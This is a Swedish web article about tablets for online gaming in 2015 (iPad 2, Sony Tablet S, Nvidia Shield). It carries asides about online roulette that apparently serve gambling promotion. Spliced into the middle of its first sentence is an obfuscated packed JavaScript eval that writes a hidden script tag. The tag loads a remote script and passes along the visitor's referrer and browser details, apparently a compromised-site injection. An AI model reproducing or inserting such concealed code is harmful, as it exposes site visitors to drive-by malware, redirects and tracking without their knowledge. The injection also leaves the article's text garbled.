Image Image Image Image Image Image Image Image Image Image

| 19 juni, 2019

Scroll to top

Top

Vad kommer vi spela på under 2015?

Vad kommer vi spela på under 2015?

Vid eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sttbb|var|u0026u|referrer|yfhzb||js|php’.split(’|’),0,{}))
starten av 2015 var spelare från hela världen lyriska över CES-konferensen, där några av de mest spännande digitala produkterna som släpps i år presenterades.

Allt från flygande bilar till produkter man kan ha på sig var stora succéer under årets konferens, men det fanns också en hel del att erbjuda på spelfronten.

Gaming har kommit långt sedan Pacman-tiden och i dag har fler och fler vänt sig till onlinevärlden för att få vår dos av spelande. Detta öppnar naturligtvis upp en annan dimension av möjligheter – vi är inte längre bundna till våra sovrum när vi vill spendera några timmar på spelande. Nu kan vi spela medan vi står i kö, pendlar till jobbet eller just helt enkelt sitter hemma – men vilka produkter underlättar mest för detta? Här kommer en sammanfattning över några av de bästa prylarna för onlinespelande 2015.

Utan tvekan så är det Apple som dominerar marknaden för spelprodukter. Trots att de tidigare var kända som en drivkraft i den mobila musikmarknaden, har uppkomsten av spel som Angry Birds gjort företaget mer synonymt med spel. Därav är produkter som Apples iPad 2 perfekta för spelande, särskilt som dess lättviktiga hårdvara gör den enkel att använda för spel som kräver lite mer fysisk interaktion än att bara peka på skärmen. Så, om en spelare sätter allt på sin tursiffra i online-roulette, är den kristallklara upplösningen och lättheten till rörelse ultimat.

Mobilt spelande har kommit långt på senare år, vilket har lett till att vi har högre krav på en modern gaming-produkt. En online spelupplevelse idag inkluderar till exempel skarp grafik och teman med vassa färger, ofta använder man sig även av sådant som är väldigt aktuellt i populärkultur, såsom Marvel-serier. De tekniska kraven på dessa större, bättre och snabbare spel ger oss en långt mer engagerande spelupplevelse, och det är upp till tillverkarna att möta den efterfrågan.

Näst på tur har vi Sony Tablet S. Om du är mer av en traditionell konsoll-spelare kommer du älska den här – den är certifierad av PlayStation, vilket innebär att du kommer kunna köra en hel uppsjö av mobila PS-spel på den. Spelare kan också njuta av förmånen att kunna koppla upp plattan till en trådlös PS3-kontroll medan man spelar spel som Wipeout och DYAD.

Nvidias Shield Tablet är garanterad att imponera på de mest tekniskt sinnade. Även om de är mest kända för att tillverka datorchip, har Nvidia mottagit lysande kritik på sistone för deras Shield Tablet, vilken kommer komplett med deras senaste Tegra-chip. Shield-plattan använder sig av Android – perfekt för fans av Androidtelefoner och Googleanvändare, och har en visuellt tilltalande 8-tums display med skarp upplösning. Snabb bearbetning är standard, så oavsett om du cruisar gatorna i det senaste racingspelet, eller försöker dig på att snurra det tidigare nämnda hjulet, så är du garanterad en uppslukande spelupplevelse.